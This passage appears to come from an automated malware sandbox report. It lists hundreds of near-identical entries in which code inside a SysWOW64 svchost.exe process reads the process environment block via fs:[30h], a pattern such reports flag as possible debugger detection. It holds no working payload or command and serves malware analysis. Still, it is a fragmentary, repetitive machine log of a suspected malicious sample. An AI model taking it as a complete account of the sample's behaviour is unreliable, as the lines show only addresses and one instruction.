          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_02FDA3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_02FDA3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_02FDA3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_02FDA3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058243 mov eax, dword ptr fs:[00000030h]1_2_03058243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058243 mov ecx, dword ptr fs:[00000030h]1_2_03058243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A625D mov eax, dword ptr fs:[00000030h]1_2_030A625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308A250 mov eax, dword ptr fs:[00000030h]1_2_0308A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308A250 mov eax, dword ptr fs:[00000030h]1_2_0308A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8397 mov eax, dword ptr fs:[00000030h]1_2_02FC8397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8397 mov eax, dword ptr fs:[00000030h]1_2_02FC8397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8397 mov eax, dword ptr fs:[00000030h]1_2_02FC8397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF438F mov eax, dword ptr fs:[00000030h]1_2_02FF438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF438F mov eax, dword ptr fs:[00000030h]1_2_02FF438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE388 mov eax, dword ptr fs:[00000030h]1_2_02FCE388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE388 mov eax, dword ptr fs:[00000030h]1_2_02FCE388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE388 mov eax, dword ptr fs:[00000030h]1_2_02FCE388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080274 mov eax, dword ptr fs:[00000030h]1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E284 mov eax, dword ptr fs:[00000030h]1_2_0300E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E284 mov eax, dword ptr fs:[00000030h]1_2_0300E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050283 mov eax, dword ptr fs:[00000030h]1_2_03050283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050283 mov eax, dword ptr fs:[00000030h]1_2_03050283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050283 mov eax, dword ptr fs:[00000030h]1_2_03050283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h]1_2_030662A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030662A0 mov ecx, dword ptr fs:[00000030h]1_2_030662A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h]1_2_030662A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h]1_2_030662A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h]1_2_030662A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h]1_2_030662A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A62D6 mov eax, dword ptr fs:[00000030h]1_2_030A62D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCC310 mov ecx, dword ptr fs:[00000030h]1_2_02FCC310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0310 mov ecx, dword ptr fs:[00000030h]1_2_02FF0310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]1_2_0307E10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCC0F0 mov eax, dword ptr fs:[00000030h]1_2_02FCC0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD80E9 mov eax, dword ptr fs:[00000030h]1_2_02FD80E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03090115 mov eax, dword ptr fs:[00000030h]1_2_03090115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCA0E3 mov ecx, dword ptr fs:[00000030h]1_2_02FCA0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307A118 mov ecx, dword ptr fs:[00000030h]1_2_0307A118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307A118 mov eax, dword ptr fs:[00000030h]1_2_0307A118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307A118 mov eax, dword ptr fs:[00000030h]1_2_0307A118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307A118 mov eax, dword ptr fs:[00000030h]1_2_0307A118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03000124 mov eax, dword ptr fs:[00000030h]1_2_03000124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064144 mov eax, dword ptr fs:[00000030h]1_2_03064144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064144 mov eax, dword ptr fs:[00000030h]1_2_03064144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064144 mov ecx, dword ptr fs:[00000030h]1_2_03064144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064144 mov eax, dword ptr fs:[00000030h]1_2_03064144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064144 mov eax, dword ptr fs:[00000030h]1_2_03064144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A0 mov eax, dword ptr fs:[00000030h]1_2_02FC80A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068158 mov eax, dword ptr fs:[00000030h]1_2_03068158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4164 mov eax, dword ptr fs:[00000030h]1_2_030A4164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4164 mov eax, dword ptr fs:[00000030h]1_2_030A4164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD208A mov eax, dword ptr fs:[00000030h]1_2_02FD208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308C188 mov eax, dword ptr fs:[00000030h]1_2_0308C188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308C188 mov eax, dword ptr fs:[00000030h]1_2_0308C188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03010185 mov eax, dword ptr fs:[00000030h]1_2_03010185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074180 mov eax, dword ptr fs:[00000030h]1_2_03074180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074180 mov eax, dword ptr fs:[00000030h]1_2_03074180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFC073 mov eax, dword ptr fs:[00000030h]1_2_02FFC073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305019F mov eax, dword ptr fs:[00000030h]1_2_0305019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305019F mov eax, dword ptr fs:[00000030h]1_2_0305019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305019F mov eax, dword ptr fs:[00000030h]1_2_0305019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305019F mov eax, dword ptr fs:[00000030h]1_2_0305019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2050 mov eax, dword ptr fs:[00000030h]1_2_02FD2050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030961C3 mov eax, dword ptr fs:[00000030h]1_2_030961C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030961C3 mov eax, dword ptr fs:[00000030h]1_2_030961C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E1D0 mov eax, dword ptr fs:[00000030h]1_2_0304E1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E1D0 mov eax, dword ptr fs:[00000030h]1_2_0304E1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E1D0 mov ecx, dword ptr fs:[00000030h]1_2_0304E1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E1D0 mov eax, dword ptr fs:[00000030h]1_2_0304E1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E1D0 mov eax, dword ptr fs:[00000030h]1_2_0304E1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCA020 mov eax, dword ptr fs:[00000030h]1_2_02FCA020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCC020 mov eax, dword ptr fs:[00000030h]1_2_02FCC020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE016 mov eax, dword ptr fs:[00000030h]1_2_02FEE016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE016 mov eax, dword ptr fs:[00000030h]1_2_02FEE016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE016 mov eax, dword ptr fs:[00000030h]1_2_02FEE016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE016 mov eax, dword ptr fs:[00000030h]1_2_02FEE016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A61E5 mov eax, dword ptr fs:[00000030h]1_2_030A61E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001F8 mov eax, dword ptr fs:[00000030h]1_2_030001F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054000 mov ecx, dword ptr fs:[00000030h]1_2_03054000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072000 mov eax, dword ptr fs:[00000030h]1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066030 mov eax, dword ptr fs:[00000030h]1_2_03066030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056050 mov eax, dword ptr fs:[00000030h]1_2_03056050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCA197 mov eax, dword ptr fs:[00000030h]1_2_02FCA197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCA197 mov eax, dword ptr fs:[00000030h]1_2_02FCA197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCA197 mov eax, dword ptr fs:[00000030h]1_2_02FCA197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6154 mov eax, dword ptr fs:[00000030h]1_2_02FD6154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6154 mov eax, dword ptr fs:[00000030h]1_2_02FD6154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCC156 mov eax, dword ptr fs:[00000030h]1_2_02FCC156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030680A8 mov eax, dword ptr fs:[00000030h]1_2_030680A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030960B8 mov eax, dword ptr fs:[00000030h]1_2_030960B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030960B8 mov ecx, dword ptr fs:[00000030h]1_2_030960B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030520DE mov eax, dword ptr fs:[00000030h]1_2_030520DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030560E0 mov eax, dword ptr fs:[00000030h]1_2_030560E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030120F0 mov ecx, dword ptr fs:[00000030h]1_2_030120F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C700 mov eax, dword ptr fs:[00000030h]1_2_0300C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03000710 mov eax, dword ptr fs:[00000030h]1_2_03000710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C720 mov eax, dword ptr fs:[00000030h]1_2_0300C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C720 mov eax, dword ptr fs:[00000030h]1_2_0300C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C730 mov eax, dword ptr fs:[00000030h]1_2_0304C730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300273C mov eax, dword ptr fs:[00000030h]1_2_0300273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300273C mov ecx, dword ptr fs:[00000030h]1_2_0300273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300273C mov eax, dword ptr fs:[00000030h]1_2_0300273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300674D mov esi, dword ptr fs:[00000030h]1_2_0300674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300674D mov eax, dword ptr fs:[00000030h]1_2_0300674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300674D mov eax, dword ptr fs:[00000030h]1_2_0300674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054755 mov eax, dword ptr fs:[00000030h]1_2_03054755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012750 mov eax, dword ptr fs:[00000030h]1_2_03012750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012750 mov eax, dword ptr fs:[00000030h]1_2_03012750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E75D mov eax, dword ptr fs:[00000030h]1_2_0305E75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4690 mov eax, dword ptr fs:[00000030h]1_2_02FD4690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4690 mov eax, dword ptr fs:[00000030h]1_2_02FD4690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307678E mov eax, dword ptr fs:[00000030h]1_2_0307678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030847A0 mov eax, dword ptr fs:[00000030h]1_2_030847A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC640 mov eax, dword ptr fs:[00000030h]1_2_02FEC640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030507C3 mov eax, dword ptr fs:[00000030h]1_2_030507C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD262C mov eax, dword ptr fs:[00000030h]1_2_02FD262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE627 mov eax, dword ptr fs:[00000030h]1_2_02FEE627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E7E1 mov eax, dword ptr fs:[00000030h]1_2_0305E7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD47FB mov eax, dword ptr fs:[00000030h]1_2_02FD47FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD47FB mov eax, dword ptr fs:[00000030h]1_2_02FD47FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E609 mov eax, dword ptr fs:[00000030h]1_2_0304E609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF27ED mov eax, dword ptr fs:[00000030h]1_2_02FF27ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF27ED mov eax, dword ptr fs:[00000030h]1_2_02FF27ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF27ED mov eax, dword ptr fs:[00000030h]1_2_02FF27ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012619 mov eax, dword ptr fs:[00000030h]1_2_03012619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03006620 mov eax, dword ptr fs:[00000030h]1_2_03006620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008620 mov eax, dword ptr fs:[00000030h]1_2_03008620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDC7C0 mov eax, dword ptr fs:[00000030h]1_2_02FDC7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD07AF mov eax, dword ptr fs:[00000030h]1_2_02FD07AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A660 mov eax, dword ptr fs:[00000030h]1_2_0300A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A660 mov eax, dword ptr fs:[00000030h]1_2_0300A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309866E mov eax, dword ptr fs:[00000030h]1_2_0309866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309866E mov eax, dword ptr fs:[00000030h]1_2_0309866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002674 mov eax, dword ptr fs:[00000030h]1_2_03002674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8770 mov eax, dword ptr fs:[00000030h]1_2_02FD8770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C6A6 mov eax, dword ptr fs:[00000030h]1_2_0300C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0750 mov eax, dword ptr fs:[00000030h]1_2_02FD0750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030066B0 mov eax, dword ptr fs:[00000030h]1_2_030066B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0300A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A6C7 mov eax, dword ptr fs:[00000030h]1_2_0300A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0710 mov eax, dword ptr fs:[00000030h]1_2_02FD0710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030506F1 mov eax, dword ptr fs:[00000030h]1_2_030506F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030506F1 mov eax, dword ptr fs:[00000030h]1_2_030506F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066500 mov eax, dword ptr fs:[00000030h]1_2_03066500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD04E5 mov ecx, dword ptr fs:[00000030h]1_2_02FD04E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD64AB mov eax, dword ptr fs:[00000030h]1_2_02FD64AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300656A mov eax, dword ptr fs:[00000030h]1_2_0300656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300656A mov eax, dword ptr fs:[00000030h]1_2_0300656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300656A mov eax, dword ptr fs:[00000030h]1_2_0300656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004588 mov eax, dword ptr fs:[00000030h]1_2_03004588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA470 mov eax, dword ptr fs:[00000030h]1_2_02FFA470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA470 mov eax, dword ptr fs:[00000030h]1_2_02FFA470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA470 mov eax, dword ptr fs:[00000030h]1_2_02FFA470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E59C mov eax, dword ptr fs:[00000030h]1_2_0300E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC645D mov eax, dword ptr fs:[00000030h]1_2_02FC645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030505A7 mov eax, dword ptr fs:[00000030h]1_2_030505A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030505A7 mov eax, dword ptr fs:[00000030h]1_2_030505A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030505A7 mov eax, dword ptr fs:[00000030h]1_2_030505A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF245A mov eax, dword ptr fs:[00000030h]1_2_02FF245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E5CF mov eax, dword ptr fs:[00000030h]1_2_0300E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E5CF mov eax, dword ptr fs:[00000030h]1_2_0300E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A5D0 mov eax, dword ptr fs:[00000030h]1_2_0300A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A5D0 mov eax, dword ptr fs:[00000030h]1_2_0300A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCC427 mov eax, dword ptr fs:[00000030h]1_2_02FCC427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE420 mov eax, dword ptr fs:[00000030h]1_2_02FCE420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE420 mov eax, dword ptr fs:[00000030h]1_2_02FCE420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE420 mov eax, dword ptr fs:[00000030h]1_2_02FCE420
